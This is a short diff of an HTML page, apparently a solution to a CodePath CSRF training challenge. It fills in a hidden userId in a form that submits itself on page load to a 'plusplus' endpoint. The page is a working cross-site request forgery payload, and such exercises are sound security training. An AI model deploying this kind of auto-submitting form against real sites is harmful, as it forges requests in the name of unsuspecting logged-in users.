--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">
-  <input type="hidden" name="userId" value="" />
+  <input type="hidden" name="userId" value="93656785cf7b341131594a924a137a59de6cb02a" />
   <input type="submit" />
 </form>
 <script> document.csrfForm.submit(); </script>
